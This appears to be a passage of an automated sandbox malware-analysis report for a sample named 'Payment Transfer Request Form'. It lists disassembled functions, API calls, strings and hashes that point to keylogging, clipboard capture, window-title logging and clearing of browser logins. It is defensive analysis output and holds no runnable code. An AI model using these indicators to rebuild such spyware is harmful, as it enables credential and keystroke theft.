                                              • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                              • Opcode Fuzzy Hash: b2b53b33f668fea9d6b70683008644784a8f2d8740eef6bc6becda6435671858
                                              • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                              Function 0040C9CE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                                              Download Yara Rule
                                              APIs
                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                                • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                                • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                              • String ID: bad locale name
                                              • API String ID: 3628047217-1405518554
                                              • Opcode ID: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                              • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                              • Opcode Fuzzy Hash: 082478905eeced14d5731d6393d842c9ba169a160db0ba1d03fb3bfa15736ecf
                                              • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                              Function 00412268 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 30registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                              • RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                              • RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: P0F
                                              • API String ID: 1818849710-3540264436
                                              • Opcode ID: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                              • Instruction ID: aa9041bc7d36289a95917c0f975a521a353b8518001b5fa9068edf17b8c75ad2
                                              • Opcode Fuzzy Hash: 621f54e733439cbcd958662464d090e9ff9f63f5a417d09ab0c58a6b3b1f16b4
                                              • Instruction Fuzzy Hash: 05E03972600308BBDB209FA09D05FEA7B6CEF04B62F1141A5BF09A6591D2758E14A7A8
                                              Function 004013F2 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013FC
                                              • GetProcAddress.KERNEL32(00000000), ref: 00401403
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: GetCursorInfo$User32.dll
                                              • API String ID: 1646373207-2714051624
                                              • Opcode ID: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                              • Instruction ID: b28a71f0ab0cd05a0e9183a6667f806437ada0decc35e30242c3667109896680
                                              • Opcode Fuzzy Hash: 088d9d047025d8497e924925820d5eb65f0f262b7c85d6662a4774416c360c30
                                              • Instruction Fuzzy Hash: 8BB09BB5741301BB8A017B705E0D905357C550470375102A3B00386161F7F44500C61E
                                              Function 00401497 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014A1
                                              • GetProcAddress.KERNEL32(00000000), ref: 004014A8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressLibraryLoadProc
                                              • String ID: GetLastInputInfo$User32.dll
                                              • API String ID: 2574300362-1519888992
                                              • Opcode ID: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                              • Instruction ID: 9c97512ccc3e9dae7fbe55962af9901819d65f6a69b3e33b2a0b565c767961ff
                                              • Opcode Fuzzy Hash: 0a32acb6837364cc41bfb1711514e79ed8798cba9f1c44e4cca123ab277e4417
                                              • Instruction Fuzzy Hash: 51B092B1980302AB8E006FB1AE0DE043AB8A604703B5102B6B00292161EAF99440CF2E
                                              Function 00448C13 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: __alldvrm$_strrchr
                                              • String ID:
                                              • API String ID: 1036877536-0
                                              • Opcode ID: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                                              • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                              • Opcode Fuzzy Hash: ffe43cf3e465c727d5e0953a870d72e00f4610d42b915cf7dfa75284df7637f7
                                              • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                              Function 0043FD01 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                              • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                              • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                              • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                              Function 00404CA3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00471EE8), ref: 00404D93
                                              • CreateThread.KERNEL32(00000000,00000000,?,00471E90,00000000,00000000), ref: 00404DA7
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DB2
                                              • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DBB
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                              • String ID:
                                              • API String ID: 3360349984-0
                                              • Opcode ID: 95b6dfaf4e6ff9eafdd44a7c1328acda1381d63f500ea4819a7b6e49070a134c
                                              • Instruction ID: 0d5bef4af40d9751d8a4c840d6feadb85822b330c50e1cee3accc81e25362d00
                                              • Opcode Fuzzy Hash: 95b6dfaf4e6ff9eafdd44a7c1328acda1381d63f500ea4819a7b6e49070a134c
                                              • Instruction Fuzzy Hash: DA4194712083016FCB11FB61CD55D6FB7EDAFD4314F400A3EB982A32E2DB7899098666
                                              Function 0040AF4D Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Cleared browsers logins and cookies., xrefs: 0040B036
                                              • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                              • API String ID: 3472027048-1236744412
                                              • Opcode ID: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                              • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                              • Opcode Fuzzy Hash: c5625c41e3350cd44f31e3f39ca14d3df05c6bc0ef5032128f41299be6cd647b
                                              • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                              Function 00411140 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 93sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 004120E8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00412104
                                                • Part of subcall function 004120E8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 0041211D
                                                • Part of subcall function 004120E8: RegCloseKey.ADVAPI32(00000000), ref: 00412128
                                              • Sleep.KERNEL32(00000BB8), ref: 004111DF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQuerySleepValue
                                              • String ID: H"G$exepath$!G
                                              • API String ID: 4119054056-2148977334
                                              • Opcode ID: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                              • Instruction ID: cc1704131a0fe244d5c58522e2247ad29464f3afd50ace533094a5add093a815
                                              • Opcode Fuzzy Hash: b63ef4792b0a54595826799ca09291a4a0f263f6c30614dda09e5540f09a92a9
                                              • Instruction Fuzzy Hash: 2321F7A1B0030426DA00B7765D56AAF724D8B84308F00447FBE46F72E3DEBC9D0981AD
                                              Function 004094FF Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 81sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                                • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                                • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                              • Sleep.KERNEL32(000001F4), ref: 0040955A
                                              • Sleep.KERNEL32(00000064), ref: 004095F5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$SleepText$ForegroundLength
                                              • String ID: [ $ ]
                                              • API String ID: 3309952895-93608704
                                              • Opcode ID: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                              • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                              • Opcode Fuzzy Hash: 1543f2ebe3b39a11f32b2ab7ee3d2400f3e72a61424cc91a421d40b22e495c0c
                                              • Instruction Fuzzy Hash: 2721657160420067C618B776DC179AE32A89F51308F40447FF552772D3EE7D9A05869F
                                              Function 00440F33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                              • Instruction ID: cddd12244c82da27d8fba5a3cfb3b4b8374ea1530061808fe1103b2c2b1f06f2
                                              • Opcode Fuzzy Hash: 87cf1a99992dac899311e5f70d4e339ac3b3345b823034c77296a488e3312c11
                                              • Instruction Fuzzy Hash: 46018FB26092163EF6302E796CC1F67271CDF517B9B21033BF625622D2EAB8CD254568
                                              Function 00440FB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                              • Instruction ID: ded37596ea74bb71ca552df42b40a6491f306b500b676c7390fdbb9d5d89f826
                                              • Opcode Fuzzy Hash: 0a806abc81d082e1cec901e4614177c074956c5300ea34d23f617e0004ee84c8
                                              • Instruction Fuzzy Hash: E801D1B220A2163EB6202E796CC9D27631DEF513BE725033BF521522E6EF7DCC855168
                                              Function 00445A95 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                                              • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LibraryLoad$ErrorLast
                                              • String ID:
                                              • API String ID: 3177248105-0
                                              • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                              • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                                              • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                                              • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8
                                              Function 0041A20F Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A23C
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A261
                                              • CloseHandle.KERNEL32(00000000,?,00000000,0040410F,00462E24), ref: 0041A26F
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseCreateHandleReadSize
                                              • String ID:
                                              • API String ID: 3919263394-0
                                              • Opcode ID: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                              • Instruction ID: 89bb00dd3d40589ea0a8ab1c68f17f151e0eed20b013a8aeca2898ab58bcd068
                                              • Opcode Fuzzy Hash: f8144eb0105f9ed2fcebd69b81e7c94004eac80e706136602d8195065f3f2b82
                                              • Instruction Fuzzy Hash: 6EF0F6B13023087FE6102B21AC84FBF369CDB867A5F01027EF901A32C1CA3A8C054536
                                              Function 00436CD1 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                              Download Yara Rule
                                              APIs
                                              • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00436CD1
                                              • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00436CD6
                                              • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00436CDB
                                                • Part of subcall function 004381DA: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004381EB
                                              • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00436CF0
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                              • String ID:
                                              • API String ID: 1761009282-0
                                              • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                              • Instruction ID: fe0629a2579d5eb29aad24ff52ac89f8c4d28ee3f0e2161d733d9faf058f7893
                                              • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                              • Instruction Fuzzy Hash: 12C00254040342742C5077B622062AEA350A8AE38DFA7B4CFB892171038D0D440B953F
                                              Function 0044015D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                              Download Yara Rule
                                              APIs
                                              • __startOneArgErrorHandling.LIBCMT ref: 004401ED
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorHandling__start
                                              • String ID: pow
                                              • API String ID: 3213639722-2276729525
                                              • Opcode ID: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                              • Instruction ID: 9a83a7e01686381b8a8ce0b853cf5bc52d75b03c70b61edc7fb1f4b11142e615
                                              • Opcode Fuzzy Hash: 28648d1c5639a1d5ffd860c5db5a803017559560979bfd47f5832c4e42ec8e44
                                              • Instruction Fuzzy Hash: 21518A60A842018AFB117714CA4137B3B90EB40701F248DABE5D2563EAEB7D8CB5DA4F
                                              Function 0040402C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00404046
                                                • Part of subcall function 00419959: GetCurrentProcessId.KERNEL32(00000000,?,?,?,?,?,?,0040405C), ref: 00419980
                                                • Part of subcall function 004168A6: CloseHandle.KERNEL32(004040D5,?,?,004040D5,00462E24), ref: 004168BC
                                                • Part of subcall function 004168A6: CloseHandle.KERNEL32($.F,?,?,004040D5,00462E24), ref: 004168C5
                                                • Part of subcall function 0041A20F: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040410F,00462E24), ref: 0041A228
                                              • Sleep.KERNEL32(000000FA,00462E24), ref: 00404118
                                              Strings
                                              • /sort "Visit Time" /stext ", xrefs: 00404092
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseFileHandle$CreateCurrentModuleNameProcessSleep
                                              • String ID: /sort "Visit Time" /stext "
                                              • API String ID: 368326130-1573945896
                                              • Opcode ID: ed87d0c96b14ea75789ea05f3b8136ef3461a361f10e5df7e9a96e23841fb500
                                              • Instruction ID: 7f8942f24ccac46b0034012f494d3192eca769648d2eef92b07e1d28e9d76a7f
                                              • Opcode Fuzzy Hash: ed87d0c96b14ea75789ea05f3b8136ef3461a361f10e5df7e9a96e23841fb500
                                              • Instruction Fuzzy Hash: B5316431A0021556CB14FBB6DC969EE73B9AF90308F40017FF506B71E2EE38594ACA99
                                              Function 0040A694 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                              • __Init_thread_footer.LIBCMT ref: 0040A6E3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Init_thread_footer__onexit
                                              • String ID: [End of clipboard]$[Text copied to clipboard]
                                              • API String ID: 1881088180-3686566968
                                              • Opcode ID: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                              • Instruction ID: 89f5e7c07999504d217297f9a041c68b3e0b8c5632e5b70e4a6c966e9d45e494
                                              • Opcode Fuzzy Hash: 8b3756b0909f45d78d669578ef8912b34d58c84c6c9fb6c8f8edd64ed624e4fc
                                              • Instruction Fuzzy Hash: 42218D31A002055ACB04FBA5D892DEDB378AF54308F10453FF506771D2EF38AE4A8A8D
                                              Function 0044ED17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044EF72,?,00000050,?,?,?,?,?), ref: 0044EDF2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: ACP$OCP
                                              • API String ID: 0-711371036
                                              • Opcode ID: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                              • Instruction ID: ce4b6ecbf16ce97eee8671cf775368e41a8ae942868fb71505acbacd33d5bec2
                                              • Opcode Fuzzy Hash: 2f6255c43d422f9ec28f5694223862b2eeac92ff2acac738a800f64e00dd4497
                                              • Instruction Fuzzy Hash: 4F21F1E2E00102A2FB348B67CC01BAB72A6FF54B51F568426E90AD7300EB3ADD41C35C
                                              Function 00415B11 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetWindowTextW.USER32(?,?,0000012C), ref: 00415B2E
                                              • IsWindowVisible.USER32(?), ref: 00415B37
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$TextVisible
                                              • String ID: (%G
                                              • API String ID: 1670992164-3377777310
                                              • Opcode ID: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                              • Instruction ID: 7bdbcb6602ffb42e5ce2137d58ff1a132c15f169860b2e192372582f8912ca7a
                                              • Opcode Fuzzy Hash: 6f17d284cfdb4df53722abd5a13ccbba9f2a9602f3f7b51a6171a740e00953ec
                                              • Instruction Fuzzy Hash: E42166315182019BC314FB61D891EEFB7E9AF94304F50493FF49A920E2FF349A49CA5A
                                              Function 00404FD4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405010
                                                • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              • GetLocalTime.KERNEL32(?,004724A8,?,00000000,?,?,?,?,?,?,004146C2,?,00000001,0000004C,00000000), ref: 00405067
                                              Strings
                                              • Connection KeepAlive | Enabled | Timeout: , xrefs: 00404FFF
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: Connection KeepAlive | Enabled | Timeout:
                                              • API String ID: 481472006-507513762
                                              • Opcode ID: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                              • Instruction ID: 0beb7a88d254a358a963561f9d97893b624dd36ca90e96b80d49a5b3b1f878f3
                                              • Opcode Fuzzy Hash: db71296423f5ae0c940390bca2fe76bdaa24d7f5692d89ec5d6dad89ab0214d4
                                              • Instruction Fuzzy Hash: 092137719042406BD304B7219D2976F7794A745308F04047EF845132E2DBBD5988CB9F
                                              Function 00432D4B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00432D8F
                                              • ___raise_securityfailure.LIBCMT ref: 00432E76
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FeaturePresentProcessor___raise_securityfailure
                                              • String ID: (F
                                              • API String ID: 3761405300-3109638091
                                              • Opcode ID: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                              • Instruction ID: 494dc9d0fce29d31cb3ef34e393fed80e8221b4646dfbf54f91bf1ae82b1ca01
                                              • Opcode Fuzzy Hash: 8d70a3cd03553c2d68efa77227729d50617932ca87f7888c32547dfbcc783ade
                                              • Instruction Fuzzy Hash: 8C21F0BD500205DEE700DF16E9856403BE4BB49314F20943AE9088B3A1F3F669918F9F
                                              Function 004194DA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LocalTime
                                              • String ID: | $%02i:%02i:%02i:%03i
                                              • API String ID: 481472006-2430845779
                                              • Opcode ID: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
                                              • Instruction ID: bce8772fa89f7f7ff9e68bb522557632f538b64cb503c22793e2f51f4d03e72f
                                              • Opcode Fuzzy Hash: 3ac86647c9e14ca6f93bd036f528b1de7b867f3a903355216a00816ff0bb3ae2
